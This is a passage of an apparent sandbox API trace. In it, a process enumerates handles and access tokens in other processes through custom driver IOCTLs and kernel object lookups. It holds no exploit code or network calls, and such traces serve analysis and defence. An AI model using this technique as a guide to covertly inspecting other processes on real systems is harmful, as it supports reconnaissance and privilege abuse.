(dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x3a4) returned 0xc4 [0116.786] GetCurrentProcess () returned 0xffffffffffffffff [0116.786] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0xec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0116.786] CloseHandle (hObject=0xc4) returned 1 [0116.786] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.786] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x88) returned 0x2ccb50 [0116.786] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2ccb50, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x2ccb50, ReturnLength=0x0) returned 0x0 [0116.786] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2ccb50 | out: hHeap=0x290000) returned 1 [0116.786] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0116.786] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.786] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.786] PsAcquireProcessExitSynchronization () returned 0x0 [0116.786] KeStackAttachProcess (in: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0) [0116.786] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002469e50, HandleInformation=0x0) returned 0x0 [0116.786] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.786] PsReleaseProcessExitSynchronization () returned 0x2 [0116.786] ObfDereferenceObject (Object=0xfffffa8002664760) returned 0x1e [0116.786] ObQueryNameString (in: Object=0xfffffa8002469e50, ObjectNameInfo=0xfffffa80026aa044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026aa044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.786] ObfDereferenceObject (Object=0xfffffa8002469e50) returned 0x3 [0116.786] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.786] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0116.786] CloseHandle (hObject=0xc0) returned 1 [0116.786] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x3a4) returned 0xc0 [0116.786] GetCurrentProcess () returned 0xffffffffffffffff [0116.787] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0116.787] CloseHandle (hObject=0xc0) returned 1 [0116.787] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.787] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x80) returned 0x2ccb50 [0116.787] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x2ccb50, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x2ccb50, ReturnLength=0x0) returned 0x0 [0116.787] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2ccb50 | out: hHeap=0x290000) returned 1 [0116.787] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0116.787] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.787] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.787] PsAcquireProcessExitSynchronization () returned 0x0 [0116.787] KeStackAttachProcess (in: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0) [0116.787] ObReferenceObjectByHandle (in: Handle=0xe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a002b5f060, HandleInformation=0x0) returned 0x0 [0116.787] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.787] PsReleaseProcessExitSynchronization () returned 0x2 [0116.787] ObfDereferenceObject (Object=0xfffffa8002664760) returned 0x1e [0116.787] ObQueryNameString (in: Object=0xfffff8a002b5f060, ObjectNameInfo=0xfffffa80026ab044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026ab044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.787] ObfDereferenceObject (Object=0xfffff8a002b5f060) returned 0x2 [0116.787] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.787] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0116.787] CloseHandle (hObject=0xc4) returned 1 [0116.787] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x3a4) returned 0xc4 [0116.787] GetCurrentProcess () returned 0xffffffffffffffff [0116.787] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0xe4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0116.787] CloseHandle (hObject=0xc4) returned 1 [0116.787] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.787] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x80) returned 0x2ccb50 [0116.787] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2ccb50, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x2ccb50, ReturnLength=0x0) returned 0x0 [0116.788] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2ccb50 | out: hHeap=0x290000) returned 1 [0116.788] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0116.788] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.788] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.788] PsAcquireProcessExitSynchronization () returned 0x0 [0116.788] KeStackAttachProcess (in: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0) [0116.788] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ea7c60, HandleInformation=0x0) returned 0x0 [0116.788] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.788] PsReleaseProcessExitSynchronization () returned 0x2 [0116.788] ObfDereferenceObject (Object=0xfffffa8002664760) returned 0x1e [0116.788] ObQueryNameString (in: Object=0xfffffa8001ea7c60, ObjectNameInfo=0xfffffa800255c504, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800255c504, ReturnLength=0xfffff88005163550) returned 0x0 [0116.788] ObfDereferenceObject (Object=0xfffffa8001ea7c60) returned 0x2 [0116.788] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.788] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0116.788] CloseHandle (hObject=0xc0) returned 1 [0116.788] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x3a4) returned 0xc0 [0116.788] GetCurrentProcess () returned 0xffffffffffffffff [0116.788] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xc0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0x0) returned 0 [0116.788] CloseHandle (hObject=0xc0) returned 1 [0116.789] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x88) returned 0x2ccb50 [0116.789] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335004c, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2ccb50, nOutBufferSize=0x88, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2ccb50*, lpBytesReturned=0x12d450*=0x28, lpOverlapped=0x0) returned 1 [0116.789] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff880051635a8 | out: Process=0xfffff880051635a8) returned 0x0 [0116.789] PsAcquireProcessExitSynchronization () returned 0x0 [0116.789] KeStackAttachProcess (in: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635c8 | out: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635c8) [0116.789] ObReferenceObjectByHandle (in: Handle=0xc0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff880051635b0, HandleInformation=0x0 | out: Object=0xfffff880051635b0*=0xfffffa80023dc3f0, HandleInformation=0x0) returned 0x0 [0116.789] PsReleaseProcessExitSynchronization () returned 0x2 [0116.789] ObfDereferenceObject (Object=0xfffffa8002664760) returned 0x1e [0116.789] ZwQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xfffff880051635a4 | out: ObjectInformation=0x0, ReturnLength=0xfffff880051635a4) returned 0xc0000004 [0116.789] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x88, Tag=0x58637250) returned 0xfffff8a002c06070 [0116.789] ZwQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0xfffff8a002c06070, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0xfffff8a002c06070, ReturnLength=0x0) returned 0x0 [0116.789] ExFreePoolWithTag (P=0xfffff8a002c06070, Tag=0x0) [0116.789] ObfDereferenceObject (Object=0xfffffa80023dc3f0) returned 0x1 [0116.789] KeUnstackDetachProcess (ApcState=0xfffff880051635c8) [0116.789] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.789] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2ccb50 | out: hHeap=0x290000) returned 1 [0116.789] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0116.789] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.789] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.789] PsAcquireProcessExitSynchronization () returned 0x0 [0116.789] KeStackAttachProcess (in: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0) [0116.789] ObReferenceObjectByHandle (in: Handle=0xc0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80023dc3f0, HandleInformation=0x0) returned 0x0 [0116.789] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.789] PsReleaseProcessExitSynchronization () returned 0x2 [0116.789] ObfDereferenceObject (Object=0xfffffa8002664760) returned 0x1e [0116.789] ObQueryNameString (in: Object=0xfffffa80023dc3f0, ObjectNameInfo=0xfffffa80027e2584, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027e2584, ReturnLength=0xfffff88005163550) returned 0x0 [0116.789] ObfDereferenceObject (Object=0xfffffa80023dc3f0) returned 0x1 [0116.790] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.790] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0116.790] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x3a4) returned 0xc0 [0116.790] GetCurrentProcess () returned 0xffffffffffffffff [0116.790] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0x0) returned 0 [0116.790] CloseHandle (hObject=0xc0) returned 1 [0116.790] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x88) returned 0x2ccb50 [0116.790] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335004c, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2ccb50, nOutBufferSize=0x88, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2ccb50, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0116.790] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff880051635a8 | out: Process=0xfffff880051635a8) returned 0x0 [0116.790] PsAcquireProcessExitSynchronization () returned 0x0 [0116.790] KeStackAttachProcess (in: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635c8 | out: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635c8) [0116.790] ObReferenceObjectByHandle (in: Handle=0xb8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff880051635b0, HandleInformation=0x0 | out: Object=0xfffff880051635b0*=0x0, HandleInformation=0x0) returned 0xc0000008 [0116.790] PsReleaseProcessExitSynchronization () returned 0x2 [0116.790] ObfDereferenceObject (Object=0xfffffa8002664760) returned 0x1e [0116.790] KeUnstackDetachProcess (ApcState=0xfffff880051635c8) [0116.790] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.790] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2ccb50 | out: hHeap=0x290000) returned 1 [0116.790] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0116.790] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1e90090, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0116.790] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.790] PsAcquireProcessExitSynchronization () returned 0x0 [0116.790] KeStackAttachProcess (in: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0) [0116.790] ObReferenceObjectByHandle (in: Handle=0xb8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0x0, HandleInformation=0x0) returned 0xc0000008 [0116.790] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.790] PsReleaseProcessExitSynchronization () returned 0x2 [0116.790] ObfDereferenceObject (Object=0xfffffa8002664760) returned 0x1e [0116.790] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.791] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0116.791] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x3a4) returned 0xc0 [0116.791] GetCurrentProcess () returned 0xffffffffffffffff [0116.791] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x38, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0116.791] CloseHandle (hObject=0xc0) returned 1 [0116.791] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.791] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x78) returned 0x2b4c50 [0116.791] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0116.791] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0116.791] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0116.791] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.791] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.791] PsAcquireProcessExitSynchronization () returned 0x0 [0116.791] KeStackAttachProcess (in: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0) [0116.791] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002680d10, HandleInformation=0x0) returned 0x0 [0116.791] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.791] PsReleaseProcessExitSynchronization () returned 0x2 [0116.791] ObfDereferenceObject (Object=0xfffffa8002664760) returned 0x1e [0116.791] ObQueryNameString (in: Object=0xfffffa8002680d10, ObjectNameInfo=0xfffffa80027fb044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027fb044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.791] ObfDereferenceObject (Object=0xfffffa8002680d10) returned 0x2 [0116.791] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.791] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0116.791] CloseHandle (hObject=0xc4) returned 1 [0116.791] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x91c) returned 0xc4 [0116.791] GetCurrentProcess () returned 0xffffffffffffffff [0116.791] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0116.791] CloseHandle (hObject=0xc4) returned 1 [0116.791] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.791] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x78) returned 0x2b4c50 [0116.792] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0116.792] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0116.792] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0116.792] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0116.792] PsLookupProcessByProcessId (in: ProcessId=0x91c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.792] PsAcquireProcessExitSynchronization () returned 0x0 [0116.792] KeStackAttachProcess (in: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002591450, ApcState=0xfffff880051635d0) [0116.792] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0116.792] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.792] PsReleaseProcessExitSynchronization () returned 0x2 [0116.792] ObfDereferenceObject (Object=0xfffffa8002591450) returned 0x21 [0116.792] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa80027ea044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027ea044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.792] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xd [0116.792] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.792] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0116.792] CloseHandle (hObject=0xc0) returned 1 [0116.792] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xa74) returned 0xc0 [0116.792] GetCurrentProcess () returned 0xffffffffffffffff [0116.792] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xb0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0116.792] CloseHandle (hObject=0xc0) returned 1 [0116.792] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.792] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x78) returned 0x2b4c50 [0116.792] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0116.792] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0116.792] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xa74) returned 0xc0 [0116.793] GetCurrentProcess () returned 0xffffffffffffffff [0116.793] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xb0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x8, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc8) returned 1 [0116.793] CloseHandle (hObject=0xc0) returned 1 [0116.793] GetTokenInformation (in: TokenHandle=0xc8, TokenInformationClass=0x1, TokenInformation=0x12dbc0, TokenInformationLength=0x800, ReturnLength=0x12d4b4 | out: TokenInformation=0x12dbc0, ReturnLength=0x12d4b4) returned 1 [0116.793] LookupAccountSidW (in: lpSystemName="", Sid=0x12dbd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12d9b0, cchName=0x12d4bc, ReferencedDomainName=0x12d7a0, cchReferencedDomainName=0x12d4b8, peUse=0x12d4e8 | out: Name="LOCAL SERVICE", cchName=0x12d4bc, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12d4b8, peUse=0x12d4e8) returned 1 [0116.796] GetTokenInformation (in: TokenHandle=0xc8, TokenInformationClass=0xa, TokenInformation=0x12d568, TokenInformationLength=0x38, ReturnLength=0x12d4b4 | out: TokenInformation=0x12d568, ReturnLength=0x12d4b4) returned 1 [0116.797] GetLastError () returned 0x6 [0116.797] SetLastError (dwErrCode=0x6) [0116.797] GetLastError () returned 0x6 [0116.797] SetLastError (dwErrCode=0x6) [0116.797] CloseHandle (hObject=0xc8) returned 1 [0116.797] CloseHandle (hObject=0xc4) returned 1 [0116.797] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x9f4) returned 0xc4 [0116.797] GetCurrentProcess () returned 0xffffffffffffffff [0116.797] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x1d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc8) returned 1 [0116.797] CloseHandle (hObject=0xc4) returned 1 [0116.797] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.797] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x78) returned 0x2b4c50 [0116.797] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0116.797] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0116.797] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.797] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.797] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.797] PsAcquireProcessExitSynchronization () returned 0x0 [0116.797] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0) [0116.797] ObReferenceObjectByHandle (in: Handle=0x1d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a7bd70, HandleInformation=0x0) returned 